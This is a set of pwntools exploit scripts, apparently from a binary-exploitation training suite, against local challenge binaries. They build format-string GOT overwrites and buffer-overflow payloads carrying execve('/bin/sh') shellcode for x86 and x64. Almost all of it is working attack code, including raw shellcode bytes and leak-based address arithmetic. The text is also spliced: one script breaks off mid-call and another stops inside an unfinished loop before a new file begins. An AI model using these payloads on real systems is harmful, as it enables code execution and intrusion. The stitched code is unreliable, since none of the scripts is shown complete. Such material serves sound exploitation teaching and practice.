# +------------------------------------------------+
# | Attack: Format String GOT Shellcode            |
# +------------------------------------------------+
#
# For more info check out: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *
import time
import sf

# Spawn the vulnerable binary and hook a debugger onto it.
target = process("./Correction-FsGotShellcode-x86")
gdb.attach(target)

bof_payload = sf.BufferOverflow(arch=32)

# The binary prints a hex value right after this prompt; it is parsed and used
# as the base against which the format-string write value is expressed.
# NOTE(review): presumably a stack address (ret_address = leak + 92), and the
# recv calls block with no timeout if the prompt text ever changes -- confirm.
target.recvuntil("Tell me I was never good enough: ")
leak_line = target.recvline().strip(b"\n")
leak = int(leak_line, 16)
ret_address = leak + 92

# NOTE(review): 0x804b2d8 is a binary-specific target address (the header
# names a GOT entry); value=-0x36 together with value_base=ret_address looks
# like "write ret_address - 0x36" -- confirm against sf.WriteFmtStr.
fs = sf.WriteFmtStr(
    arch=32,
    address=0x804b2d8,
    address_base=0,
    value=-0x36,
    value_base=ret_address,
    offset=0x4,
    printed_bytes=0x0,
    alignment_bytes=0x0,
)

# Second payload builder: the format string lands at offset 92.
payload = sf.BufferOverflow(arch=32, start=92)
payload.add_bytes(92, fs.generate_fmt_str())
payload.add_bytes(
    54,
from pwn import *
import time
import sys
import signal
import sf

# Spawn the vulnerable binary and hook a debugger onto it, running the
# "verify_exploit" gdb command set on attach.
target = process("./Correction-CallInput-x86")
gdb.attach(target, execute="verify_exploit")

bof_payload = sf.BufferOverflow(arch=32)

# 28-byte x86 payload placed at the very start of the input. The bytes decode
# to the classic execve("/bin//sh") sequence (xor eax,eax; push eax;
# push "//sh"; push "/bin"; mov ebx,esp; mov ecx,eax; mov edx,eax;
# mov al,0xb; int 0x80) followed by exit (xor eax,eax; inc eax; int 0x80).
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
)

bof_payload.set_input_start(0x0)
bof_payload.add_bytes(0x0, shellcode)
# Everything not explicitly set is filled with NOP (0x90) bytes.
bof_payload.set_default_byte(b"\x90")

payload = bof_payload.generate_payload()
target.sendline(payload)

# Exploit Verification starts here 15935728


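def handler(signum, frame):
    """Signal handler that aborts the exploit-verification wait by raising.

    Intended to be installed with ``signal.signal`` (the registration and the
    alarm that triggers it are outside this view). Raises ``TimeoutError``
    instead of a bare ``Exception`` so callers can target the timeout
    specifically; since ``TimeoutError`` is an ``Exception`` subclass, any
    existing ``except Exception`` handler still catches it.

    Args:
        signum: Signal number delivered by the runtime (unused).
        frame: Interrupted stack frame (unused).

    Raises:
        TimeoutError: Always, with the message "Timed out".
    """
    raise TimeoutError("Timed out")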


def check_verification_done():
    while True:
        if os.path.exists("pwned") or os.path.exists("rip"):
            sys.exit(0)
from pwn import *

import os
import sf
import sys
import signal

# Spawn the vulnerable binary and hook a debugger onto it, running the
# "verify_exploit" gdb command set on attach.
target = process("./chall-test_FmtString-20-x64")
gdb.attach(target, execute="verify_exploit")

bof_payload = sf.BufferOverflow(arch=64)

# The binary prints a hex value right after this prompt; it is parsed and used
# as the base against which the format-string write value is expressed.
# NOTE(review): presumably a stack address (ret_address = leak + 168), and the
# recv calls block with no timeout if the prompt text ever changes -- confirm.
target.recvuntil("Tell me I was never good enough: ")
leak_line = target.recvuntil(b"\n").strip(b"\n")
leak = int(leak_line, 16)
ret_address = leak + 168

# NOTE(review): 0x4033b8 is a binary-specific target address (presumably a
# GOT entry, as in the sibling x86 example); value=-0x50 together with
# value_base=ret_address looks like "write ret_address - 0x50" -- confirm
# against sf.WriteFmtStr.
fs = sf.WriteFmtStr(
    arch=64,
    address=0x4033b8,
    address_base=0,
    value=-0x50,
    value_base=ret_address,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
)

# 24-byte x86-64 shellcode. The bytes decode to: xor esi,esi; movabs rdi with
# the negated "/bin/sh\0"; neg rdi; mul esi (zeroes rdx); add al,0x3b
# (execve); push rdi; push rsp; pop rdi; syscall.
shellcode = (
    b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff"
    b"\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
)

# Second payload builder: the format string lands at offset 168, the
# shellcode at offset 80.
payload = sf.BufferOverflow(arch=64, start=168)
payload.add_bytes(168, fs.generate_fmt_str())
payload.add_bytes(80, shellcode)
target.sendline(payload.generate_payload())